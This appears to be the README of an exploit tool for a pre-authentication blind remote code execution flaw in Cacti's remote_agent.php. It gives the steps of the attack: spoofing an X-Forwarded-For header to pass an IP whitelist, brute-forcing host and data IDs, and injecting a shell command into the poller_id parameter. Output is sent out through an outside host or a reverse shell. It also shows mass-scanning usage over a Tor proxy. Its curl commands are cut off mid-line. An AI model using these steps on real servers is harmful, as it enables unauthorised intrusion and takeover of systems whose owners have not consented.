Cacti Blind Remote Code Execution (Pre-Auth)
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
This script bruteforces variables required to exploit this vulnerability. This exploit requires the following 3 variables:
- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter
The file `remote_agent.php` is protected by a IP whitelist. You can bypass this by spoofing your IP address in the `X-Forwarded-IP` header. Most instances will have `127.0.0.1` or the server's own IP address whitelisted.
Next you need to bruteforce the `host_id` and `local_data_ids` request parameters. This is done by enumerating pairs of integers `x,y` from a default min value of 1 and max value of 10.
curl -k -H "X-Forwarded-For: 127.0.0.1" \
After you've gotten these 3 variables, you can inject a shell command into the `poller_id` key and escape it by putting a `;` before your command.
This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL encode your the `poller_id` value!
The following executes the command `ping $(whoami).test.com`
curl -k -H "X-Forwarded-For: 127.0.0.01" \
The script oututs in a CSV format. The headers are `"target", "ip", "host_id", "data_id", "url"`.
If the `url` value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.
## Parsing Output
You can use the following commands to quickly parse the output file
### Targets with IP restriction bypassed
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
### Exploitable Targets
tail -n +2 results.csv | cut -d ',' -f5 | sort -u
go build -v -o bruteforce bruteforce.go
./bruteforce -l targets.txt -t 50 -min 1 -max 10
- **Targets must be a list of IP addresses, port may be omitted**
- Socks5 proxy is supported `-proxy socks5://127.0.0.1:9050`
- Default output file is `results.csv`